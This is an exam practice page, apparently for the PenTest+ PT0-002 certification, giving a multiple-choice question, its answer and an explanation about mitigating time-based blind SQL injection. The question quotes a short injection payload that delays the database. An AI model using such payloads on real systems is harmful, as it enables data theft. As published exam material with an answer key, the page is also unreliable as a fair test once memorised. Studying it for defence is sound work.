PT0-002 Question #382: Real Exam Question with Answer & Explanation

The correct answer is B: Parameterizing queries. The payload used by the penetration tester is a type of blind SQL injection attack that delays the response of the database by 15 seconds if the condition is true. This can be used to extract information from the database by asking a series of true or false questions. To prevent

Attacks and Exploits

Question

A penetration tester managed to exploit a vulnerability using the following payload: IF (1=1) WAIT FOR DELAY '0:0:15' Which of the following actions would best mitigate this type ol attack?

Options

AEncrypting passwords
BParameterizing queries
CEncoding output
DSanitizing HTML

Explanation

The payload used by the penetration tester is a type of blind SQL injection attack that delays the response of the database by 15 seconds if the condition is true. This can be used to extract information from the database by asking a series of true or false questions. To prevent this type of attack, the best practice is to use parameterized queries, which separate the user input from the SQL statement and prevent the injection of malicious code. Encrypting passwords, encoding output, and sanitizing HTML are also good security measures, but they do not directly address the SQL injection vulnerability.

Topics

#SQL Injection#Web Application Security#Vulnerability Mitigation#Parameterized Queries

Community Discussion

No community discussion yet for this question.

Full PT0-002 Practice Browse All PT0-002 Questions